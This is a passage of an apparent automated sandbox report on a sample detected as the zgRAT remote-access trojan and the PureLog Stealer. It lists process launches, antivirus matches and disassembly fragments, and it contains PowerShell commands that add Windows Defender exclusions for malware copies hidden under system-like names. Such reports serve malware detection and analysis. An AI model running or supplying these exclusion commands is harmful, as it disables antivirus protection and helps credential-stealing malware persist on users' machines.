                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DC7.tmp" "c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP"
                                                                                                    Imagebase:0x7ff7830e0000
                                                                                                    File size:52'744 bytes
                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:19
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:20
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:21
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:22
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:23
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:24
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:25
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:26
                                                                                                    Start time:08:52:02
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:27
                                                                                                    Start time:08:52:03
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:28
                                                                                                    Start time:08:52:03
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:29
                                                                                                    Start time:08:52:03
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0xc60000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:30
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0x8f0000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:31
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat"
                                                                                                    Imagebase:0x7ff7bca50000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:32
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:33
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                                    Imagebase:0x630000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:34
                                                                                                    Start time:08:52:04
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff7a72a0000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:35
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:36
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                                    Imagebase:0xe60000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:37
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                                    Imagebase:0x250000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:38
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Imagebase:0xa00000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:39
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Imagebase:0xf80000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:40
                                                                                                    Start time:08:52:05
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:ping -n 10 localhost
                                                                                                    Imagebase:0x7ff6f3350000
                                                                                                    File size:22'528 bytes
                                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:41
                                                                                                    Start time:08:52:10
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:42
                                                                                                    Start time:08:52:13
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                                    Imagebase:0x410000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:44
                                                                                                    Start time:08:52:15
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0x9e0000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:45
                                                                                                    Start time:08:52:19
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                    File size:55'320 bytes
                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:46
                                                                                                    Start time:08:52:21
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0xc80000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:49
                                                                                                    Start time:08:52:31
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                                    Imagebase:0xb90000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:50
                                                                                                    Start time:08:52:41
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                                                                                                    Imagebase:0x840000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:51
                                                                                                    Start time:08:52:49
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                                                                                                    Imagebase:0xd70000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:52
                                                                                                    Start time:08:52:58
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                                                                                                    Imagebase:0x2d0000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:53
                                                                                                    Start time:08:53:06
                                                                                                    Start date:04/01/2025
                                                                                                    Path:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\windows nt\smartscreen.exe"
                                                                                                    Imagebase:0x90000
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5 hash:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:4.5%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:12
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 18481 7ffd9ba4d7ad 18482 7ffd9ba4d7bb SuspendThread 18481->18482 18484 7ffd9ba4d894 18482->18484 18473 7ffd9ba4f0e9 18474 7ffd9ba4f0f7 CloseHandle 18473->18474 18476 7ffd9ba4f1d4 18474->18476 18477 7ffd9ba51055 18478 7ffd9ba510a2 GetFileAttributesW 18477->18478 18480 7ffd9ba51135 18478->18480 18469 7ffd9ba4ef88 18470 7ffd9ba4ef9b ResumeThread 18469->18470 18472 7ffd9ba4f094 18470->18472

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B890DA0 Relevance: .3, Instructions: 293COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fb65997b5001c93fc84794cb675850c33af5511056ffe88a06a7ed2429d29173
                                                                                                      • Instruction ID: 30453d11af9de37a2b06a9be6ba90dd02eac8357b0076a8b188d8590a114abc4
                                                                                                      • Opcode Fuzzy Hash: fb65997b5001c93fc84794cb675850c33af5511056ffe88a06a7ed2429d29173
                                                                                                      • Instruction Fuzzy Hash: B1A1F5B1A19A4D8FE798DB68C8657AEBFE1FF59310F4401BAD049D72D6CB782801C741
                                                                                                      Function 00007FFD9BF31926 Relevance: 6.5, Strings: 5, Instructions: 256COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.$;#.$D$8A$L$8t
                                                                                                      • API String ID: 0-2189781871
                                                                                                      • Opcode ID: ae720dc11bbe11f4e3d6e1dafa42d0d5b195f2efa0e573efd5bec7f1ffbc2487
                                                                                                      • Instruction ID: 298161318f9339d9f7b3fc27e0ddbedaca9def2e2b07bae6210074a0a83dcadc
                                                                                                      • Opcode Fuzzy Hash: ae720dc11bbe11f4e3d6e1dafa42d0d5b195f2efa0e573efd5bec7f1ffbc2487
                                                                                                      • Instruction Fuzzy Hash: 09815E31B0E64A8FE7388F68947557577E0EF45391B1602BED48FC3196DE2ABB028742
                                                                                                      Function 00007FFD9BF33B81 Relevance: 5.5, Strings: 4, Instructions: 509COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 97 7ffd9bf33b81 98 7ffd9bf33b86-7ffd9bf33b8e 97->98 99 7ffd9bf33b94-7ffd9bf33ba6 call 7ffd9bf33550 98->99 100 7ffd9bf33d11-7ffd9bf33d37 98->100 103 7ffd9bf33ba8-7ffd9bf33bad 99->103 104 7ffd9bf33b75-7ffd9bf33b7c 99->104 106 7ffd9bf33bcf-7ffd9bf33be0 103->106 107 7ffd9bf33baf-7ffd9bf33bb3 103->107 105 7ffd9bf33d50-7ffd9bf33d55 104->105 105->97 110 7ffd9bf33be6-7ffd9bf33bfb 106->110 111 7ffd9bf33d5a-7ffd9bf33d75 106->111 108 7ffd9bf33cb3-7ffd9bf33cd6 107->108 109 7ffd9bf33bb9-7ffd9bf33bca 107->109 109->100 110->111 112 7ffd9bf33c01-7ffd9bf33c0d 110->112 118 7ffd9bf33d7d 111->118 119 7ffd9bf33d77 111->119 113 7ffd9bf33c0f-7ffd9bf33c26 call 7ffd9bf32060 112->113 114 7ffd9bf33c3e-7ffd9bf33c54 call 7ffd9bf33550 112->114 113->108 124 7ffd9bf33c2c-7ffd9bf33c3b call 7ffd9bf32190 113->124 114->108 125 7ffd9bf33c56-7ffd9bf33c61 114->125 122 7ffd9bf33d7f 118->122 123 7ffd9bf33d81-7ffd9bf33de3 118->123 119->118 122->123 139 7ffd9bf33dee-7ffd9bf33dfb 123->139 140 7ffd9bf33dab-7ffd9bf33de7 123->140 124->114 125->111 128 7ffd9bf33c67-7ffd9bf33c7c 125->128 128->111 132 7ffd9bf33c82-7ffd9bf33c95 128->132 133 7ffd9bf33c97-7ffd9bf33cb1 call 7ffd9bf32060 132->133 134 7ffd9bf33ce9-7ffd9bf33cf1 132->134 133->108 145 7ffd9bf33cd7-7ffd9bf33ce6 call 7ffd9bf32190 133->145 138 7ffd9bf33cf9-7ffd9bf33cfc 134->138 142 7ffd9bf33d03-7ffd9bf33d0b 138->142 149 7ffd9bf33dfd-7ffd9bf33e0c 139->149 150 7ffd9bf33e5b-7ffd9bf33e61 139->150 159 7ffd9bf33e0e-7ffd9bf33e40 140->159 160 7ffd9bf33dc5-7ffd9bf33de0 140->160 142->100 146 7ffd9bf33b4a-7ffd9bf33b57 142->146 145->134 146->142 155 7ffd9bf33b5d-7ffd9bf33b71 146->155 149->139 153 7ffd9bf33f32 150->153 154 7ffd9bf33e66-7ffd9bf33e6f 150->154 153->154 156 7ffd9bf33f37 154->156 155->142 163 7ffd9bf33f0d-7ffd9bf33f25 156->163 164 7ffd9bf33e86-7ffd9bf33e89 156->164 168 7ffd9bf33f28-7ffd9bf33f2d 159->168 163->168 164->163 165 7ffd9bf33e8f-7ffd9bf33e92 164->165 169 7ffd9bf33e94-7ffd9bf33ec1 165->169 170 7ffd9bf33efb-7ffd9bf33f02 165->170 181 7ffd9bf33f41-7ffd9bf33f4c 168->181 182 7ffd9bf33e5c-7ffd9bf33e61 168->182 173 7ffd9bf33f04-7ffd9bf33f0c 170->173 174 7ffd9bf33ec2-7ffd9bf33edc 170->174 177 7ffd9bf33f61-7ffd9bf33fac call 7ffd9bf307c0 174->177 178 7ffd9bf33ee2-7ffd9bf33eed 174->178 190 7ffd9bf33fae-7ffd9bf33fb1 177->190 178->177 179 